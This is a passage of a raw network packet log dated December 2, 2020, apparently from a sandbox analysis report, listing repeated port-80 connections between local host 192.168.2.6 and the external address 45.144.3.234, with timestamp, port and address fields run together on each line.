                                            Dec 2, 2020 11:53:35.284322977 CET804985645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.284406900 CET4985680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.336648941 CET804985645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.356287003 CET804985645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.356326103 CET804985645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.356419086 CET4985680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.356472969 CET4985680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.409007072 CET804985645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.568877935 CET4985780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.623812914 CET804985745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.624006987 CET4985780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.626805067 CET4985780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.680356979 CET804985745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.680749893 CET4985780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.733665943 CET804985745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.766350031 CET804985745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.766401052 CET804985745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.766483068 CET4985780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.766567945 CET4985780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:35.822000027 CET804985745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:35.963965893 CET4985880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.015819073 CET804985845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.015970945 CET4985880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.022089958 CET4985880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.073909998 CET804985845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.075316906 CET4985880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.127099037 CET804985845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.150350094 CET804985845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.150374889 CET804985845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.150475025 CET4985880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.150523901 CET4985880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.202258110 CET804985845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.377655983 CET4985980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.431946993 CET804985945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.433054924 CET4985980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.435767889 CET4985980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.488503933 CET804985945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.488735914 CET4985980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.541281939 CET804985945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.561460018 CET804985945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.561527967 CET804985945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.561654091 CET4985980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.561714888 CET4985980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.613833904 CET804985945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.814595938 CET4986080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.870469093 CET804986045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.870728970 CET4986080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.878453016 CET4986080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.931209087 CET804986045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:36.931330919 CET4986080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:36.985781908 CET804986045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.006664038 CET804986045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.006726027 CET804986045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.007230997 CET4986080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.007514000 CET4986080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.060122967 CET804986045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.253230095 CET4986180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.312910080 CET804986145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.313149929 CET4986180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.316129923 CET4986180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.369714022 CET804986145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.369921923 CET4986180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.427234888 CET804986145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.454833031 CET804986145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.454854012 CET804986145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.454941988 CET4986180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.455108881 CET4986180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.507255077 CET804986145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.698945999 CET4986280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.751543999 CET804986245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.751691103 CET4986280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.757545948 CET4986280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.810255051 CET804986245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.810399055 CET4986280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.863025904 CET804986245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.885756016 CET804986245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.885788918 CET804986245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:37.887649059 CET4986280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.887676954 CET4986280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:37.943142891 CET804986245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.121664047 CET4986380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.175348997 CET804986345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.175575018 CET4986380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.181313038 CET4986380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.234263897 CET804986345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.234414101 CET4986380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.287364006 CET804986345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.308756113 CET804986345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.308835030 CET804986345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.308924913 CET4986380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.309082985 CET4986380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.364501953 CET804986345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.541636944 CET4986480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.594322920 CET804986445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.594609022 CET4986480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.602222919 CET4986480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.655045986 CET804986445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.655989885 CET4986480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.708775997 CET804986445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.728997946 CET804986445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.729027033 CET804986445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.729181051 CET4986480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.729207039 CET4986480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.784696102 CET804986445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.904696941 CET4986680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.957643986 CET804986645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:38.957834005 CET4986680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:38.961338997 CET4986680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.015126944 CET804986645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.015393019 CET4986680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.068842888 CET804986645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.091332912 CET804986645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.091372967 CET804986645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.091526985 CET4986680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.091687918 CET4986680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.144315958 CET804986645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.331469059 CET4986780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.383951902 CET804986745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.384469032 CET4986780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.390388966 CET4986780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.442924023 CET804986745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.443120956 CET4986780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.495834112 CET804986745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.517182112 CET804986745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.517231941 CET804986745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.517362118 CET4986780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.517472029 CET4986780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.569928885 CET804986745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.755434990 CET4986980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.807678938 CET804986945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.807827950 CET4986980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.815212011 CET4986980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.867341995 CET804986945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.867501974 CET4986980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.919962883 CET804986945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.940459967 CET804986945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.940483093 CET804986945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:39.940577984 CET4986980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.940694094 CET4986980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:39.995011091 CET804986945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.248302937 CET4987080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.302660942 CET804987045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.302797079 CET4987080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.305916071 CET4987080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.358587027 CET804987045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.358675003 CET4987080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.411305904 CET804987045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.432230949 CET804987045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.432287931 CET804987045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.432523012 CET4987080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.432640076 CET4987080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.485151052 CET804987045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.609244108 CET4987180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.661473036 CET804987145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.661678076 CET4987180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.669919968 CET4987180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.722270966 CET804987145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.722479105 CET4987180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.775104046 CET804987145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.795722961 CET804987145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.795753002 CET804987145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:40.795909882 CET4987180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.795965910 CET4987180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:40.848496914 CET804987145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.068084002 CET4987280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.121190071 CET804987245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.121296883 CET4987280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.124373913 CET4987280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.197175980 CET804987245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.197284937 CET4987280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.252159119 CET804987245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.271989107 CET804987245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.272025108 CET804987245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.272089005 CET4987280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.272128105 CET4987280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.324942112 CET804987245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.451344013 CET4987380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.503247023 CET804987345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.503350973 CET4987380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.506474018 CET4987380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.558113098 CET804987345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.558218956 CET4987380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.609883070 CET804987345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.630264044 CET804987345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.630315065 CET804987345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.630388021 CET4987380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.630528927 CET4987380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.682096004 CET804987345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.850534916 CET4987480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.903225899 CET804987445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.903445959 CET4987480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.908529997 CET4987480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:41.961376905 CET804987445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:41.961838007 CET4987480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.014751911 CET804987445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:42.037555933 CET804987445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:42.037599087 CET804987445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:42.037792921 CET4987480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.037838936 CET4987480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.090663910 CET804987445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:42.303910971 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.356565952 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:42.356735945 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.363986015 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.648721933 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:42.961201906 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:43.570696115 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.382122993 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.423307896 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.423357964 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.423388958 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.446561098 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.446609974 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.446713924 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.447252035 CET4987580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.499388933 CET804987545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.673971891 CET4987680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.726337910 CET804987645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.727319002 CET4987680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.731017113 CET4987680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.783607006 CET804987645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.783736944 CET4987680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.836077929 CET804987645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.857261896 CET804987645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.857295990 CET804987645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:44.857456923 CET4987680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.857538939 CET4987680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:44.909871101 CET804987645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.050667048 CET4987780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.103207111 CET804987745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.103382111 CET4987780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.110817909 CET4987780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.163263083 CET804987745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.163388014 CET4987780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.215890884 CET804987745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.239439011 CET804987745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.239474058 CET804987745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.239610910 CET4987780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.239686012 CET4987780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.291980028 CET804987745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.473335028 CET4987880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.525808096 CET804987845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.525943041 CET4987880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.530514956 CET4987880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.593090057 CET804987845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.593251944 CET4987880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.645926952 CET804987845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.675241947 CET804987845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.675282001 CET804987845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.675451994 CET4987880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.675571918 CET4987880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.728193045 CET804987845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.914829969 CET4987980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.966703892 CET804987945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:45.966866970 CET4987980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:45.971009970 CET4987980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.022850990 CET804987945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.022999048 CET4987980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.075485945 CET804987945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.096854925 CET804987945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.096900940 CET804987945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.097079992 CET4987980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.097103119 CET4987980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.149228096 CET804987945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.333570957 CET4988080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.386058092 CET804988045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.386224031 CET4988080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.394583941 CET4988080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.447017908 CET804988045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.447155952 CET4988080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.500629902 CET804988045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.522598028 CET804988045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.522624016 CET804988045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.522792101 CET4988080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.522841930 CET4988080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.576479912 CET804988045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.757225037 CET4988180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.809813023 CET804988145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.809943914 CET4988180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.812716961 CET4988180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.866322041 CET804988145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.866413116 CET4988180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.919950962 CET804988145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.941849947 CET804988145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.941869020 CET804988145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:46.941957951 CET4988180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:46.994688034 CET804988145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.164014101 CET4988280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.217607021 CET804988245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.217736959 CET4988280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.221801043 CET4988280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.275010109 CET804988245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.275233030 CET4988280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.327701092 CET804988245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.351135015 CET804988245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.351167917 CET804988245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.351243019 CET4988280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.351280928 CET4988280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.403829098 CET804988245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.602010012 CET4988380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.654807091 CET804988345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.654953003 CET4988380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.662367105 CET4988380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.715044975 CET804988345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.715826035 CET4988380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.769511938 CET804988345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.791692972 CET804988345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.791729927 CET804988345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:47.791862011 CET4988380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.791973114 CET4988380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:47.844554901 CET804988345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.025940895 CET4988480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.078469038 CET804988445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.078668118 CET4988480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.086473942 CET4988480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.138578892 CET804988445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.138742924 CET4988480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.190975904 CET804988445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.211004972 CET804988445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.211035967 CET804988445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.211194992 CET4988480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.211338997 CET4988480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.263413906 CET804988445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.437994003 CET4988580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.489897966 CET804988545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.490041018 CET4988580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.497369051 CET4988580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.552171946 CET804988545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.552340984 CET4988580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.604376078 CET804988545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.626811028 CET804988545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.626837969 CET804988545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.626946926 CET4988580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.627118111 CET4988580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.678942919 CET804988545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.869942904 CET4988680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.922439098 CET804988645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.922646999 CET4988680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.930011034 CET4988680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:48.982949018 CET804988645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:48.983072996 CET4988680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.046664953 CET804988645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.073543072 CET804988645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.073786020 CET4988680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.073812962 CET804988645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.073936939 CET4988680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.126135111 CET804988645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.291044950 CET4988780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.343102932 CET804988745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.343255997 CET4988780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.346885920 CET4988780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.399246931 CET804988745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.399409056 CET4988780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.451726913 CET804988745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.473378897 CET804988745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.473495007 CET804988745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.473591089 CET4988780192.168.2.645.144.3.234
